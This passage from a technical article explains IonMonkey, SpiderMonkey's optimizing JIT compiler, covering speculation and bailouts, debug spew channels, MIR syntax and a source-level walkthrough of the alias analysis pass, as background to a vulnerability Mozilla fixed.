000003add5d09278 6a0d                  push 0Dh
000003add5d0927a e900000000            jmp 000003add5d0927f
000003add5d0927f 6a00                  push 0
000003add5d09281 e99a6effff            jmp 000003add5d00120 <- bailout


OK so this was for optimizing and JIT compiler, but what about speculative now? If you think about this for a minute or two though, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the object you are dealing with, and this information is hard to get in dynamically typed languages because by-design the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculate about types, instead what they usually do is introspect the program at runtime and observe what is going on.
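
The listing above can be read as: add two int32 values, bail out on signed overflow, otherwise OR the result with a constant and return it. The sketch below mimics that shape in JavaScript. It is a toy model, not Ion's code: the name speculativeAddInt32 is invented, the explicit type guard stands in for checks that are not visible in the listing, and reading 0xFFF8800000000000 as the tag of a boxed int32 is our interpretation of the constant.

```javascript
// Constant loaded into rcx in the listing (assumed to be the int32 tag).
const INT32_TAG = 0xfff8800000000000n;

// Returns the boxed 64-bit result, or null to signal a bailout.
function speculativeAddInt32(a, b) {
  // Guard: the speculation only holds when both inputs are int32 values.
  if ((a | 0) !== a || (b | 0) !== b) return null;
  const sum = a + b;
  // Equivalent of `jo`: the sum no longer fits in a signed 32-bit integer.
  if ((sum | 0) !== sum) return null;
  // Equivalent of `or rcx,rax`: the 32-bit result zero-extended, plus the tag.
  return INT32_TAG | BigInt(sum >>> 0);
}

const boxed = speculativeAddInt32(1, 2);
const overflow = speculativeAddInt32(0x7fffffff, 1);
const wrongType = speculativeAddInt32("1", 2);

console.log(boxed.toString(16), overflow, wrongType);
```

Both null cases correspond to the situation where the generated code cannot continue and has to hand execution back to a slower tier.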
If this function has been invoked many times and every time it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall back to executing the code in the interpreter (this is called a deoptimization bailout), resulting in a performance hit.

As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).

// Force how many invocation or loop iterations are needed before compiling
// a function with the highest ionmonkey optimization level.
// (i.e. OptimizationLevel_Normal)
const char* forcedDefaultIonWarmUpThresholdEnv =
    "JIT_OPTION_forcedDefaultIonWarmUpThreshold";
if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) {
  Maybe<int> value = ParseInt(env);
  if (value.isSome()) {
    forcedDefaultIonWarmUpThreshold.emplace(value.ref());
  } else {
    Warn(forcedDefaultIonWarmUpThresholdEnv, env);
  }
}

// From the Javascript shell source-code
int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold");
if (warmUpThreshold >= 0) {
  jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold);
}


On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses on Ion which is the fastest/most expensive tier of JIT in Spidermonkey. Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki):

OK so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later) code. This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic-blocks and themselves form a control-flow graph.

Ion's optimization pipeline is composed of 29 steps: certain steps actually modify the MIR graph by removing or shuffling nodes and others don't modify it at all (they just analyze it and produce results consumed by later passes).

To debug Ion, I recommend adding the below to your mozconfig file:

ac_add_options --enable-jitspew


This basically turns on a bunch of macros in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer but we will do with the tools we have. The JIT subsystem can define a number of channels where it can output spew and the user can turn on/off any of them. This is pretty useful if you want to debug a single optimization pass for example.

// New channels may be added below.
#define JITSPEW_CHANNEL_LIST(_)          \
/* Information during sinking */         \
_(Prune)                                 \
/* Information during escape analysis */ \
_(Escape)                                \
/* Information during alias analysis */  \
_(Alias)                                 \
/* Information during alias analysis */  \
_(AliasSummaries)                        \
/* Information during GVN */             \
_(GVN)                                   \
/* Information during sincos */          \
_(Sincos)                                \
/* Information during sinking */         \
_(Sink)                                  \
/* Information during Range analysis */  \
_(Range)                                 \
/* Information during LICM */            \
_(LICM)                                  \
/* Info about fold linear constants */   \
_(FLAC)                                  \
/* Effective address analysis info */    \
_(EAA)                                   \
/* Information during regalloc */        \
_(RegAlloc)                              \
/* Information during inlining */        \
_(Inlining)                              \
/* Information during codegen */         \
_(Codegen)                               \
/* Debug info about safepoints */        \
_(Safepoints)                            \
/* Debug info about Pools*/              \
_(Pools)                                 \
/* Profiling-related information */      \
_(Profiling)                             \
/* Information of tracked opt strats */  \
_(OptimizationTracking)                  \
_(OptimizationTrackingExtended)          \
/* Debug info about the I$ */            \
_(CacheFlush)                            \
/* Output a list of MIR expressions */   \
_(MIRExpressions)                        \
/* Print control flow graph */           \
_(CFG)                                   \
\
/* BASELINE COMPILER SPEW */             \
\
/* Aborting Script Compilation. */       \
_(BaselineAbort)                         \
/* Script Compilation. */                \
_(BaselineScripts)                       \
/* Detailed op-specific spew. */         \
_(BaselineOp)                            \
/* Inline caches. */                     \
_(BaselineIC)                            \
/* Inline cache fallbacks. */            \
_(BaselineICFallback)                    \
/* OSR from Baseline => Ion. */          \
_(BaselineOSR)                           \
/* Bailouts. */                          \
_(BaselineBailouts)                      \
/* Debug Mode On Stack Recompile . */    \
_(BaselineDebugModeOSR)                  \
\
/* ION COMPILER SPEW */                  \
\
/* Used to abort SSA construction */     \
_(IonAbort)                              \
/* Information about compiled scripts */ \
_(IonScripts)                            \
/* Info about failing to log script */   \
_(IonSyncLogs)                           \
/* Information during MIR building */    \
_(IonMIR)                                \
/* Information during bailouts */        \
_(IonBailouts)                           \
/* Information during OSI */             \
_(IonInvalidate)                         \
/* Debug info about snapshots */         \
_(IonSnapshots)                          \
/* Generated inline cache stubs */       \
_(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
JitSpew_Terminator
};


In order to turn those channels on you need to define an environment variable called IONFLAGS where you can specify a comma-separated string with all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don’t quite match the macros above, so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
fflush(nullptr);
printf(
"\n"
"usage: IONFLAGS=option,option,option,... where options can be:\n"
"\n"
"  aborts        Compilation abort messages\n"
"  scripts       Compiled scripts\n"
"  mir           MIR information\n"
"  prune         Prune unused branches\n"
"  escape        Escape analysis\n"
"  alias         Alias analysis\n"
"  alias-sum     Alias analysis: shows summaries for every block\n"
"  gvn           Global Value Numbering\n"
"  licm          Loop invariant code motion\n"
"  flac          Fold linear arithmetic constants\n"
"  sincos        Replace sin/cos by sincos\n"
"  sink          Sink transformation\n"
"  regalloc      Register allocation\n"
"  inline        Inlining\n"
"  snapshots     Snapshot information\n"
"  codegen       Native code generation\n"
"  bailouts      Bailouts\n"
"  caches        Inline caches\n"
"  osi           Invalidation\n"
"  safepoints    Safepoints\n"
"  pools         Literal Pools (ARM only for now)\n"
"  cacheflush    Instruction Cache flushes (ARM only for now)\n"
"  range         Range Analysis\n"
"  logs          JSON visualization logging\n"
"  logs-sync     Same as logs, but flushes between each pass (sync. "
"compiled functions only).\n"
"  profiling     Profiling-related information\n"
"  trackopts     Optimization tracking information gathered by the "
"Gecko profiler. "
"(Note: call enableGeckoProfiling() in your script to enable it).\n"
"  trackopts-ext Encoding information about optimization tracking\n"
"  dump-mir-expr Dump the MIR expressions\n"
"  cfg           Control flow graph generation\n"
"  all           Everything\n"
"\n"
"  bl-aborts     Baseline compiler abort messages\n"
"  bl-scripts    Baseline script-compilation\n"
"  bl-op         Baseline compiler detailed op-specific messages\n"
"  bl-ic         Baseline inline-cache messages\n"
"  bl-ic-fb      Baseline IC fallback stub messages\n"
"  bl-osr        Baseline IC OSR messages\n"
"  bl-bails      Baseline bailouts\n"
"  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
"  bl-all        All baseline spew\n"
"\n"
"\n");
exit(status);
}
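
To make the name mismatch a bit more concrete, here is a minimal JavaScript sketch of how a comma-separated IONFLAGS value could be mapped onto channel names. This is not Spidermonkey code: parseIonFlags and the OPTION_TO_CHANNEL table are hypothetical, the table only covers a handful of options, and each pairing is my own reading of the help text against the JITSPEW_CHANNEL_LIST descriptions.

```javascript
// Hypothetical subset of the option-name -> channel-name mapping. The pairs
// are inferred by matching the help text against the channel descriptions.
const OPTION_TO_CHANNEL = {
  "alias": "Alias",
  "alias-sum": "AliasSummaries",
  "gvn": "GVN",
  "licm": "LICM",
  "range": "Range",
  "bailouts": "IonBailouts",
  "bl-aborts": "BaselineAbort",
};

// Splits an IONFLAGS-style string and returns the enabled channels plus any
// option names this toy table does not know about.
function parseIonFlags(value) {
  const enabled = new Set();
  const unknown = [];
  for (const raw of value.split(",")) {
    const option = raw.trim();
    if (option === "") {
      continue;
    }
    if (Object.prototype.hasOwnProperty.call(OPTION_TO_CHANNEL, option)) {
      enabled.add(OPTION_TO_CHANNEL[option]);
    } else {
      // "logs" ends up here: I could not pair it with an entry of the
      // channel listing shown in this article.
      unknown.push(option);
    }
  }
  return { enabled: [...enabled], unknown };
}

console.log(parseIonFlags("alias,alias-sum,gvn,bailouts,logs"));
```

The point is only that the option string is a flat list of short names, and that each short name has to be looked up to find the channel it toggles.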


An important channel is logs, which tells the compiler to output an ion.json file (in /tmp on Linux) that packs a ton of information gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser, whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the passes directly from the browser, which I find more convenient than navigating through a bunch of PNG files:

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite


Reading MIR code is not too bad, you just have to know a few things:

1. Every instruction is an object
2. Each instruction can have operands that can be the result of a previous instruction
10 | add unbox8:Int32 unbox9:Int32 [int32]

3. Every instruction is identified by an identifier, which is an integer starting from 0
4. There are no variable names; to reference the result of a previous instruction, Ion builds a name by concatenating the name of the instruction with its identifier, like unbox8 and unbox9 above. Those two names reference the two unbox instructions identified by 8 and 9:
08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)
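
The naming rule above can be sketched in a few lines of JavaScript. This is a toy model and not how Ion prints its graph: makeIns, operandName and render are hypothetical helpers, and the trailing result type that the real spew appends (the [int32] part) is left out.

```javascript
// Toy model of a MIR instruction: an id, an opcode, operands (other
// instructions) and an optional result type. Field names are illustrative.
function makeIns(id, opcode, operands = [], type = null) {
  return { id, opcode, operands, type };
}

// An operand is printed as <opcode><id>, optionally followed by :<type>.
function operandName(ins) {
  const suffix = ins.type ? `:${ins.type}` : "";
  return `${ins.opcode}${ins.id}${suffix}`;
}

// Renders an instruction roughly the way the listings in this article do.
function render(ins) {
  const id = String(ins.id).padStart(2, "0");
  const operands = ins.operands.map(operandName).join(" ");
  return `${id} | ${ins.opcode} ${operands}`.trimEnd();
}

const unbox8 = makeIns(8, "unbox", [], "Int32");
const unbox9 = makeIns(9, "unbox", [], "Int32");
const add10 = makeIns(10, "add", [unbox8, unbox9], "Int32");

console.log(render(add10));
```

Because operands are references to other instructions and not to variables, following a name like unbox8 always leads to exactly one defining instruction.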


That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

• JavaScript Core powering Safari:

• Chakra powering Microsoft Edge: Architecture overview

Let's have a look at alias analysis now :)

Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass, which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger and follow the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
const a = [1,2,3,4];
a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
x();
}


Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


The alias analysis is able to output a summary on the alias-sum channel and this is what it prints out when run against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29


OK, so that's kind of a lot for now so let's start at the beginning. Ion uses what it calls alias sets. You can see an alias set as an equivalence set (a term also used in compiler literature): everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that’s all it cares about. Alias information is used later in the pipeline to carry out optimizations such as redundancy elimination - more on that later.

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.


In Ion, instructions are free to provide refinement to their alias set by overloading getAliasSet; here are the various alias sets defined for every different MIR opcode that we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
// NewArray is marked as non-effectful because all our allocations are
// either lazy when we are using "new Array(length)" or bounded by the
// script or the stack size when we are using "new Array(...)" or "[...]"
// notations.  So we might have to allocate the array twice if we bail
// during the computation of the first element of the square braket
// notation.
virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Load(AliasSet::ObjectFields);
}
};

// Store a value to a dense array slots vector.
class MStoreElement
: public MTernaryInstruction,
public MStoreElementCommon,
public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element);
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};

class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Load(AliasSet::ObjectFields);
}
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
UnboxedInt32Policy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
}
};
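
One way to picture these alias sets is as a kind (none, load or store) plus a bitmask of categories. The JavaScript below is a rough sketch under that assumption, not the real js::jit::AliasSet: ObjectFields = 1 is consistent with the "(flags 1)" spew printed for setinitializedlength14 later in this section, but the other bit positions are made up, and elements is modeled as Load(ObjectFields) because that is how this section describes it further down.

```javascript
// Category bits. Only ObjectFields = 1 is backed by the spew in this article;
// the other positions are assumptions.
const Flag = {
  ObjectFields: 1 << 0,
  Element: 1 << 1,
  DynamicSlot: 1 << 2,
  FixedSlot: 1 << 3,
};
Flag.Any = Flag.ObjectFields | Flag.Element | Flag.DynamicSlot | Flag.FixedSlot;

class AliasSet {
  constructor(kind, flags) {
    this.kind = kind;   // "none", "load" or "store"
    this.flags = flags; // bitwise OR of Flag values
  }
  static None() { return new AliasSet("none", 0); }
  static Load(flags) { return new AliasSet("load", flags); }
  static Store(flags) { return new AliasSet("store", flags); }
  isNone() { return this.kind === "none"; }
  isLoad() { return this.kind === "load"; }
  isStore() { return this.kind === "store"; }
  // Two alias sets intersect when they share at least one category bit.
  intersects(other) { return (this.flags & other.flags) !== 0; }
}

const elements = AliasSet.Load(Flag.ObjectFields);
const storeElement = AliasSet.Store(Flag.Element);
const setInitializedLength = AliasSet.Store(Flag.ObjectFields);
const arraySlice = AliasSet.Store(Flag.Element | Flag.ObjectFields);

console.log(elements.intersects(storeElement));         // false
console.log(elements.intersects(setInitializedLength)); // true
console.log(elements.intersects(arraySlice));           // true
```

With this picture in mind, a refinement is simply an instruction promising to touch fewer categories than the conservative default.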


The analyze function ignores instructions that are associated with no alias set as you can see below..:

    for (MInstructionIterator def(block->begin()),
end(block->begin(block->lastIns()));
def != end; ++def) {
def->setId(newId++);
AliasSet set = def->getAliasSet();
if (set.isNone()) {
continue;
}


..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]


This reads as: instructions 13, 18, 23, 28 and 35 are store instructions in the AliasSet::Element alias set. Note that instruction 35 not only aliases AliasSet::Element but also AliasSet::ObjectFields.
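
As a sanity check, the two vectors can be rebuilt from the simplified MIR with a few lines of JavaScript. This is a toy model: ALIAS_SET is a hand-written table based on the getAliasSet overloads discussed above (the entry for arraylength is an assumption on my side and does not influence the result), and collectStores is a hypothetical helper.

```javascript
// Alias set per opcode, as a kind plus the categories it touches.
const ALIAS_SET = {
  elements: { kind: "load", categories: ["ObjectFields"] },
  storeelement: { kind: "store", categories: ["Element"] },
  setinitializedlength: { kind: "store", categories: ["ObjectFields"] },
  arraylength: { kind: "load", categories: ["ObjectFields"] }, // assumption
  arrayslice: { kind: "store", categories: ["Element", "ObjectFields"] },
};

// The simplified MIR of x as [id, opcode] pairs.
const mir = [
  [12, "elements"], [13, "storeelement"], [14, "setinitializedlength"],
  [17, "elements"], [18, "storeelement"], [19, "setinitializedlength"],
  [22, "elements"], [23, "storeelement"], [24, "setinitializedlength"],
  [27, "elements"], [28, "storeelement"], [29, "setinitializedlength"],
  [33, "elements"], [34, "arraylength"], [35, "arrayslice"],
];

// Builds one vector of store ids per alias set category.
function collectStores(instructions) {
  const stores = { Element: [], ObjectFields: [] };
  for (const [id, op] of instructions) {
    const set = ALIAS_SET[op];
    if (set.kind !== "store") {
      continue;
    }
    for (const category of set.categories) {
      stores[category].push(id);
    }
  }
  return stores;
}

console.log(collectStores(mir));
```

Instruction 35 lands in both vectors because its alias set covers both categories.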

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction with the current store candidate (note that there is no need to walk the stores[AliasSet::Element] vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, it is not enough for the two instructions to have alias sets that intersect (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operand of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect does what its name suggests. The MayAlias analysis does two things:

1. Check if two instructions have intersecting alias sets
   1. AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element)
2. Check if these instructions operate on intersecting TypeSets
   1. GetObject is used to grab the appropriate operand off the instruction,
   2. Then get its TypeSet,
   3. And compute the intersection with objectsIntersect.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
case MDefinition::Opcode::InitializedLength:
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}

// Generic comparing if a load aliases a store using TI information.
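MDefinition::AliasType AliasAnalysis::genericMightAlias(
const MDefinition* load, const MDefinition* store) {
const MDefinition* loadObject = GetObject(load);
const MDefinition* storeObject = GetObject(store);
if (!loadObject || !storeObject) {
return MDefinition::AliasType::MayAlias;
}

if (!loadObject->resultTypeSet() || !storeObject->resultTypeSet()) {
return MDefinition::AliasType::MayAlias;
}

if (loadObject->resultTypeSet()->objectsIntersect(
storeObject->resultTypeSet())) {
return MDefinition::AliasType::MayAlias;
}

return MDefinition::AliasType::NoAlias;
}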


Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (it has a Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]


The next step of the algorithm now is to figure out if the current load depends on a prior store. If it does, a dependency link is created between the two; if it doesn't, it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersect with the alias set of the load instruction (there is no point in carrying on if we already know off the bat that they don't even intersect).

In our case, 17 | elements newarray9:Object can only alias with a store coming from stores[AliasSet::ObjectFields], and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes are even related to each other. Keep in mind that those nodes are instructions with operands, and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}


Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
while (object->isSlots() || object->isElements() ||
object->isConvertElementsToDoubles()) {
MOZ_ASSERT(object->numOperands() == 1);
object = object->getOperand(0);
}
if (object->isTypedArrayElements()) {
return nullptr;
}
if (object->isTypedObjectElements()) {
return nullptr;
}
if (object->isConstantElements()) {
return nullptr;
}
return object;
}


In our case newarray9:Object doesn't need any unwrapping as it is not an MSlots, MElements or MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first argument elements12 which isn't the actual 'root' object. This is when MaybeUnwrap is useful: it grabs for us the first operand of 12 | elements newarray9:Object, newarray9, which is the root object. Cool.
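
Here is the same unwrapping logic as a small JavaScript sketch, run against toy versions of the nodes involved. The node layout, the lowercase opcode strings and the getObject shortcut (it always picks operand 0, which is only valid for the opcodes used here) are assumptions made for the example.

```javascript
// Toy nodes: each has an opcode, an id and a list of operands.
const newarray9 = { op: "newarray", id: 9, operands: [] };
const constant11 = { op: "constant", id: 11, operands: [] };
const elements12 = { op: "elements", id: 12, operands: [newarray9] };
const setinitializedlength14 = {
  op: "setinitializedlength",
  id: 14,
  operands: [elements12, constant11],
};
const elements17 = { op: "elements", id: 17, operands: [newarray9] };

// Opcodes that merely wrap an object (mirrors the while loop of MaybeUnwrap).
const WRAPPERS = new Set(["slots", "elements", "convertelementstodoubles"]);
// Opcodes for which MaybeUnwrap gives up and returns nullptr.
const UNTRACKED = new Set([
  "typedarrayelements",
  "typedobjectelements",
  "constantelements",
]);

function maybeUnwrap(node) {
  while (WRAPPERS.has(node.op)) {
    node = node.operands[0];
  }
  return UNTRACKED.has(node.op) ? null : node;
}

// For the opcodes used in this example the relevant object is operand 0.
function getObject(ins) {
  return maybeUnwrap(ins.operands[0]);
}

console.log(getObject(elements17) === newarray9);             // true
console.log(getObject(setinitializedlength14) === newarray9); // true
```

Both the load and the store candidate resolve to the very same node, which is what the type-based check that follows relies on.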

Anyways, once we have our two objects, loadObject and storeObject, we need to figure out if they are related. To do that, Ion uses a structure called a js::TemporaryTypeSet. My understanding is that a TypeSet completely describes the values that a particular lvalue might have.

/*
* [SMDOC] Type-Inference TypeSet
*
* Information about the set of types associated with an lvalue. There are
* three kinds of type sets:
*
* - StackTypeSet are associated with TypeScripts, for arguments and values
*   observed at property reads. These are implicitly frozen on compilation
*   and only have constraints added to them which can trigger invalidation of
*   TypeNewScript information.
*
* - HeapTypeSet are associated with the properties of ObjectGroups. These
*   may have constraints added to them to trigger invalidation of either
*   compiled code or TypeNewScript information.
*
* - TemporaryTypeSet are created during compilation and do not outlive
*   that compilation.
*
* The contents of a type set completely describe the values that a particular
* lvalue might have, except for the following cases:
*
* - If an object's prototype or class is dynamically mutated, its group will
*   change. Type sets containing the old group will not necessarily contain
*   the new group. When this occurs, the properties of the old and new group
*   will both be marked as unknown, which will prevent Ion from optimizing
*   based on the object's type information.
*
* - If an unboxed object is converted to a native object, its group will also
*   change and type sets containing the old group will not necessarily contain
*   the new group. Unlike the above case, this will not degrade property type
*   information, but Ion will no longer optimize unboxed objects with the old
*   group.
*/


As a reminder, in our case we have newarray9:Object as loadObject (extracted off 17 | elements newarray9:Object) and newarray9:Object as storeObject (extracted off 14 | setinitializedlength elements12:Elements constant11:Int32, which is the store candidate). Their TypeSets intersect (they are the same one), and as a result genericMightAlias returns AliasType::MayAlias.
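
The decision taken by genericMightAlias can be summarized with the JavaScript sketch below. It is only a model: a type set is represented as a Set of made-up group names, which is far simpler than a real TemporaryTypeSet, and the two conservative early returns reflect my understanding of the function (no object or no type information means MayAlias).

```javascript
// Returns true when the two toy type sets share at least one group.
function objectsIntersect(a, b) {
  for (const group of a) {
    if (b.has(group)) {
      return true;
    }
  }
  return false;
}

function genericMightAlias(loadObject, storeObject) {
  // Unknown object on either side: stay conservative.
  if (!loadObject || !storeObject) {
    return "MayAlias";
  }
  // No type information on either side: stay conservative.
  if (!loadObject.typeSet || !storeObject.typeSet) {
    return "MayAlias";
  }
  return objectsIntersect(loadObject.typeSet, storeObject.typeSet)
    ? "MayAlias"
    : "NoAlias";
}

// "ArrayGroup" and "OtherGroup" are hypothetical group names.
const newarray9 = { name: "newarray9", typeSet: new Set(["ArrayGroup"]) };
const unrelated = { name: "unrelated", typeSet: new Set(["OtherGroup"]) };

console.log(genericMightAlias(newarray9, newarray9)); // MayAlias
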